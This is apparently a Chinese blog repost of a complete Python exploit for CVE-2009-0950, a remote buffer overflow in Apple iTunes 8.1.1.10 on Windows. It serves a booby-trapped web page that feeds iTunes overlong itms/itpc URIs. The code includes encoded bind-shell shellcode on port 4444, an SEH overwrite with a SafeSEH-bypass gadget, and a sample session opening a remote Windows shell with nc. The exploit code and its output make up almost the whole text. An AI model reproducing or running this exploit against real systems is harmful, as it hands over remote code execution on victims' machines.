随着IPhone的热门及流行,越来越多的机器安装了Apple iTunes,这2天出的这个 Apple iTunes 8.1.1.10 (itms/itcp)远程缓冲区溢出漏洞利用工具Exploit (win) 漏洞就显得严重了些。
1#!/usr/bin/python2# [Apple iTunes 8.1.1.10 itms/itcp BOF Windows Exploit](/blog/apple-itunes-81110-itms-itcp-remote-buffer-overflow-exploit-win)3# Matteo Memelli | ryujin __A-T__ offensive-security.com4# Spaghetti & Pwnsauce - 06/10/20095# CVE-2009-0950 http://dvlabs.tippingpoint.com/advisory/TPTI-09-036#7
8# Vulnerability can't be exploited simply overwriting a return address on the9# stack because of stack canary protection. Increasing buffer size leads to10# SEH overwrite but it seems that the Access Violation needed to get our own11# Exception Handler called is not always thrown.12# So, to increase reliability, the exploit sends two URI to iTunes:13# - the 1st payload corrupts the stack (it doesnt overwrite cookie, no crash)14# - the 2nd payload fully overwrite SEH to 0wN EIP129 collapsed lines
15# Payloads must be encoded in order to obtain pure ASCII printable shellcode.16# I could trigger the vulnerability from Firefox but not from IE that seems17# to truncate the long URI.18# Tested on Windows XP SP2/SP3 English, Firefox 3.0.10,19# iTunes 8.1.1.10, 8.1.0.5220#21# --> hola hola ziplock, my Apple Guru! ;) && cheers to muts... he knows why22#23# ryujin:Desktop ryujin$ ./ipwn.py24# [+] iTunes 8.1.10 URI Bof Exploit Windows Version CVE-2009-095025# [+] Matteo Memelli aka ryujin __A-T__ offensive-security.com26# [+] www.offensive-security.com27# [+] Spaghetti & Pwnsauce28# [+] Listening on port 8029# [+] Connection accepted from: 172.16.30.730# [+] Payload sent, wait 20 secs for iTunes error!31# ryujin:Desktop ryujin$ nc -v 172.16.30.7 444432# Connection to 172.16.30.7 4444 port [tcp/krb524] succeeded!33# Microsoft Windows XP [Version 5.1.2600]34# (C) Copyright 1985-2001 Microsoft Corp.35#36# C:Program FilesMozilla Firefox>37
38from socket import *39
40html = """41<html>42 <head><title>iTunes loading . . .</title>43 <script>44 function openiTunes(){document.location.assign("itms://itunes.apple.com/");}45 function prepareStack(){document.location.assign("%s");}46 function ownSeh(){document.location.assign("%s");}47 function ipwn(){48 prepareStack();49 ownSeh();50 }51 function main() {52 openiTunes();53 // Increase this timeout if your iTunes takes more time to load!54 setTimeout('ipwn()',20000);55 }56 </script>57 </head>58 <body onload="main();">59 <p align="center">60 <b>iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950</b>61 </p>62 <p align="center"><b>ryujin __ A-T __ offensive-security.com</b></p>63 <p align="center"><b>www.offensive-security.com</b></p>64 <p align="center">65 iTunes starting... wait for 20 secs; if you get an error, click "Ok"66 in the MessageBox before checking for your shell on port 4444 :)<br/>67 If victim host is not connected to the internet, exploit will fail68 unless iTunes is already opened and you disable "openiTunes" javascript69 function.70 <br/>71 <h2 align="center">72 <b><u>This exploit works if opened from Firefox not from IE!</u></b>73 </h2>74 <p align="center">75 After exploitation iTunes crashes, you need to kill it from TaskManager76 <br/>have fun!</br>77 </p>78 </p>79 </body>80</html>"""81
82# Alpha2 ASCII printable Shellcode 730 Bytes, via EDX (0x60,0x40 Badchar)83# This is not standard Alpha2 bind shell. Beginning of shellcode is modified84# in order to obtain register alignment and to reset ESP and EBP we mangled85# before. Rest of decoded shellcode is Metasploit bind shell on port 444486# EXITFUNC=thread87#88shellcode = ("VVVVVVVVVVVVVVVVV7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIOqhDahIoS0"89 "5QnaJLS1uQVaeQcdcm2ePESuW5susuPEsuilazJKRmixHykOkOKOCPLKPlUtu"90 "tnkRegLLKSLfepx31zOlK2o7hlKqOEpWqZK3ylKwDLKeQHndqo0j9llOt9P3D"91 "uW9Q8J4MWqkrJKkDukPTWTq845M5LKQOq4VajKcVLKTLPKlKQOUL6ajK336LL"92 "KMY0lWTwle1O3TqiK2DLKaSFPLKQPVllK0p7lLmlK3pUXQNU8LNbnvnjL0PkO"93 "8V2Fv3U61xds02U8RWpsVRqO649on0PhjkZMYlekpPKOKfsoMYkUpfna8mgxV"94 "b65RJuRIoHPPhHYFiL5lmBwkOzvpSPSV3F3bsg3BsSsScIohPsVRHR1sl2Fcc"95 "k9M1nuphOT6zppIWrwKO8VcZ6ppQv5KO8PBHmtNMvNm9QGKON6aCqEkOZpbHZ"96 "EbiNfRiSgioiFRpf40TseiohPLSu8KWD9kvPyf7YoxVqEKOxPu6sZpd3VSX1s"97 "0mK98ecZRpv9Q9ZlMYkWqzpDmYxbTqO0KCoZKNaRVMkN3r6LJ3NmpzFXNKNKL"98 "ksX0rkNls5FkOrURdioXVSk67PRPQsapQCZgqbq0QSesaKOxPaxNMZyEUjnCc"99 "KOn6qzKOkOtwKOJpNk67YlMSKtcTyozvrryozp0hXoZnYp1p0SkOXVKOHPA")100# Padding101pad0x1 = "x41"*425102
103# Make EDX pointing to shellcode and "pray" sh3llcod3 M@cumBa w00t w00t104align = "x61"*45 + "x54x5A" + "x42"*6 + "V"*10105
106# Padding107pad0x2 = "x41"*570108
109# ASCII friendly RET overwriting SEH: bye bye canary, tweet tweet110# 0x67215e2a QuickTime.qts ADD ESP,8;RETN (SafeSEH bypass)111ret = "x2ax5ex21x67"112
113# Let the dance begin... Point EBP to encoded jmp114align_for_jmp = "x61x45x45x45" + ret + "x44" + "x45"*7115
116# Decode a NEAR JMP and JUMP BACK BABY!117jmp_back = ("UYCCCCCCIIIIIIIIII7QZjAXP0A0AkA"118 "AQ2AB2BB0BBABXP8ABuJIZIE5jZKOKOA")119# Padding120pad0x3 = "x43"*162121
122# We send 2 payloads to iTunes: first is itms and second itpc123# url1 smashes the stack in order to get an AV later124url1 = "itms://:" + "x41"*200 + "/"125url2 = "itpc://:" + pad0x1 + align + shellcode +pad0x2 +126 align_for_jmp + jmp_back + pad0x3127payload = html % (url1, url2)128
129print "[+] [iTunes 8.1.1.10 URI Bof Exploit Windows Version CVE-2009-0950](/blog/apple-itunes-81110-itms-itcp-remote-buffer-overflow-exploit-win)"130print "[+] Matteo Memelli aka ryujin __A-T__ offensive-security.com"131print "[+] www.offensive-security.com"132print "[+] Spaghetti & Pwnsauce"133s = socket(AF_INET, SOCK_STREAM)134s.bind(("0.0.0.0", 80))135s.listen(1)136print "[+] Listening on port 80"137c, addr = s.accept()138print "[+] Connection accepted from: %s" % (addr[0])139c.recv(1024)140c.send(payload)141print "[+] Payload sent, wait 20 secs for iTunes error!"142c.close()143s.close()